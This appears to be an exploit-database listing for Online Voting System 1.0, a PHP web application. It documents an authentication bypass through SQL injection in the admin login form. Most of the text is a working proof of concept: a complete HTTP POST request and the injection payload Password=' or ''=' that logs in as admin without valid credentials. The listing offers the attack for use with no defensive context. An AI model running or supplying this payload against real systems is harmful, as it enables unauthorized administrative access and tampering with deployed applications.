Share
## https://sploitus.com/exploit?id=PACKETSTORM:163332
# Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi)  
# Exploit Author: deathflash1411  
# Date 30.06.2021  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html  
# Version 1.0  
# Tested on: Ubuntu 20.04  
  
####################  
# Proof of Concept #  
####################  
  
POST /Online_voting_system/admin/ HTTP/1.1  
Host: localhost  
Content-Length: 50  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://localhost/Online_voting_system/admin/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a  
Connection: close  
  
UserName=admin&Password=%27+or+%27%27%3D%27&Login=  
  
###########  
# Payload #  
###########  
  
UserName=admin  
Password=' or ''='